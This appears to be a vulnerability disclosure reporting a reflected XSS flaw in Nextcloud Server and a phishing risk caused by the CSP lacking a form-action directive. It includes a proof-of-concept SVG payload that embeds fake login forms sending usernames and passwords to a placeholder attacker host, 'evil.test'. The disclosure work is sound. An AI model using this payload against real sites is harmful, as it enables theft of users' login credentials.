I just found a reflected Cross-Site Scripting (XSS) vulnerability in Nextcloud Server that affects current stable and dates back to at least 15.0.5.
The vulnerability seems mitigated by a Content-Security-Policy (CSP), but there might be a residual risk for phishing, due to the CSP’s lack of a form-action
directive.
Steps to repeat (for basic XSS):
0) Replace server.test in the following URLs with your own test instance of Nextcloud.
Steps to repeat for phishing
0) Replace server.test in the following URLS with your own test instance of Nextcloud.
<svg width="256" height="128" version="1.1" viewBox="0 0 256 128" xmlns="http://www.w3.org/2000/svg"><g fill="none" stroke-width="22"><circle cx="40" cy="64" r="26" stroke="#fff"/><foreignObject class="node" x="0" y="0" width="600" height="600"><div><p>Login</p><form action="//evil.test"><input placeholder="Username" type="text"/><br /> <input placeholder="Password" type="text" /><br /><input type="submit" value="Login" /></form></div></foreignObject><circle alt="" fill="none"/><circle cx="216" cy="64" r="26" stroke="#fff"/><foreignObject class="node" x="0" y="0" width="600" height="600"><div><p>Login</p><form action="//evil.test"><input placeholder="Username" type="text"/><br /> <input placeholder="Password" type="text" /><br /><input type="submit" value="Login" /></form></div></foreignObject><circle alt="" fill="none"/><circle cx="128" cy="64" r="46" stroke="#fff"/><foreignObject class="node" x="0" y="0" width="600" height="600"><div><p>Login</p><form action="//evil.test"><input placeholder="Username" type="text"/><br /> <input placeholder="Password" type="text" /><br /><input type="submit" value="Login" /></form></div></foreignObject><circle alt="" fill="none"/></g></svg>